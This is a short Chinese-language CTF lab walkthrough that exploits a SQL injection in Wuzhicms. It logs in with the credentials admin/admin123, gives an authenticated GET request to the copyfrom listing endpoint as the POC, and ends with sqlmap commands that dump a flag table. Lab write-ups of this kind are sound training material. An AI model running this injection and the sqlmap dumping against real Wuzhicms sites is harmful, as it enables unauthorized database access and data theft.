进入靶场后会看到如下画面
在尝试目录扫描后未发现有用的路径
根据靶场提示,可以得知CMS为Wuzhicms,于是上网搜索相对应的Sql注入漏洞
发现http://IP:端口/www/index.php?m=core&f=index&_su=wuzhicms
可以进入到登录界面
可由暴力破解或信息收集得到
账号为admin,密码为admin123
登录成功后,可得如下界面
然后构造POC
GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1 HTTP/1.1
Host: 你的IP
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1710990068; _ga=GA1.2.70323571.1712124646; _ga_J1DQF09WZC=GS1.2.1712124647.1.1.1712125047.0.0.0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1712538461; PHPSESSID=0b2930da5b333118b6c07edeada52bf0; Jun_uid=9988J6B6QqW4gppsWSliOXoCz0qdvILetqwfzqwG; Jun_username=8f40r1Lhw7JFdEQFlT%2FkLf00b6Jk682Lqb5dqiQCGK16uA; Jun_wz_name=85a81VrtQAYnNfYmbyH9z2zX7%2FZnON69uH3NO4v3JiHT8g; Jun_siteid=278drzZMMKo8R4AFby8LK6deMpm%2BfeA520Hk%2B9Ih
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)
然后执行 sqlmap -r xxx.txt -D wuzhicms --tables
再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns
最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump
得到flag!